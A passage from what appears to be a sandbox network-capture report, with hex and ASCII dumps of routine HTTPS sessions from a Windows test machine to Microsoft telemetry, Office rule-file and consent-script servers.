                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                              Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                              Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                              Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                              Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                              2024-11-21 07:30:55 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                              Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              96192.168.2.649824184.28.90.27443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:54 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                              2024-11-21 07:30:55 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                                              X-CID: 11
                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                                              Cache-Control: public, max-age=206036
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:54 GMT
                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                              Connection: close
                                                                                                                                                                              X-CID: 2
                                                                                                                                                                              2024-11-21 07:30:55 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              97192.168.2.64982513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:54 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:55 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 2284
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                              ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                              x-ms-request-id: 4ee4281a-701e-0098-0fa0-3b395f000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073055Z-r1d97b99577dd2gchC1TEBz5ys00000009sg00000000hbgd
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:55 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              98192.168.2.64982713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:55 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:55 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                              ETag: "0x8DC582BDC681E17"
                                                                                                                                                                              x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073055Z-1777c6cb7549x5qchC1TEBggbg0000000av000000000830m
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:55 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              99192.168.2.64982613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:55 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:55 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                              ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                              x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073055Z-1777c6cb754n67brhC1TEBcp9c0000000axg0000000029gn
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:55 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              100192.168.2.64982913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:56 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:56 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                              ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                              x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073056Z-178bfbc474btvfdfhC1NYCa2en0000000180000000005pt0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:56 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              101192.168.2.64983013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:56 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:56 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                              ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                              x-ms-request-id: 7f9cd87c-f01e-00aa-33aa-3b8521000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073056Z-r1d97b99577sdxndhC1TEBec5n0000000a70000000004sr0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:56 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              102192.168.2.64983313.107.246.424435636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:57 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                              Host: wcpstatic.microsoft.com
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                              2024-11-21 07:30:57 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:57 GMT
                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                              Content-Length: 52717
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                              Age: 1523
                                                                                                                                                                              Cache-Control: max-age=43200
                                                                                                                                                                              Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                              Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                              Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                              x-ms-request-id: 09b6fa6f-101e-0038-42e3-3b8981000000
                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                              x-azure-ref: 20241121T073057Z-178bfbc474bp8mkvhC1NYCzqnn00000000wg00000000hafg
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:57 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                              Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
